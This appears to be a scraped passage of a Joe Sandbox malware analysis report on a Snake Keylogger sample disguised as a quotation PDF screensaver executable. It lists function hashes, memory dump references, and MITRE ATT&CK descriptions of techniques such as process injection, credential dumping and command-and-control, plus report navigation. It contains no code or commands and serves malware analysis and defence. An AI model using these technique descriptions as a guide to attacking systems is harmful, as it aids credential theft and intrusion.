Opcode Fuzzy Hash: 299e4f62aba14f7cacd68fb14bfd4de7c649a94eae7758c72ff05ab03102ed93
Instruction Fuzzy Hash: 31E0C270919A589FDB90EB688899B9ABBF2EF19210F1480E9C44DD7221DA389985CB01

Function 00007FF887BD2066 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82c1bec27c3df65063f31af751507f79e31e2fb1cb1b1cd48ab375831c49c66e
Instruction ID: d789a480d64f4a0bb7d269e273324d3fb194ed8d72a85f61ef82defdfd78a8fe
Opcode Fuzzy Hash: 82c1bec27c3df65063f31af751507f79e31e2fb1cb1b1cd48ab375831c49c66e
Instruction Fuzzy Hash: A0E0C7B045E7C86FC3128BB0086E1CDBFF0DF02260B0448CEC0898B122E4294A8ACB02

Function 00007FF887BD0F3D Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b915183fdd24216ca9c8fe4732b56c21bdb8aec2ddc84e8d581024b78b9def03
Instruction ID: 23dc39913ccedf0e34cde6c0381915b62f4a71bf13ad6ec3e417953844c525c3
Opcode Fuzzy Hash: b915183fdd24216ca9c8fe4732b56c21bdb8aec2ddc84e8d581024b78b9def03
Instruction Fuzzy Hash: B6D0127058464A5FD3C1DB68885DAAD7AE1FF09254B4400F9C808C7196CA285C898740

Function 00007FF887BD51FA Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2660191344.00007FF887BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff887bd0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28cef6431f3e7c11396a8c3fff0626b1b970bc9a361ad307faa61c7976d5174a
Instruction ID: cabd13776263ae57f15c00b47c5225b2d09fbe698eb10469554068907bea0ddb
Opcode Fuzzy Hash: 28cef6431f3e7c11396a8c3fff0626b1b970bc9a361ad307faa61c7976d5174a
Instruction Fuzzy Hash: 9DA0020F79412520951075DEB5016DCD729EAC33F75145133E70DD40531948608A16A7

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION_OCTQTRA071244#U00faPDF.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
QUOTATION_OCTQTRA071244#U00faPDF.scr.exe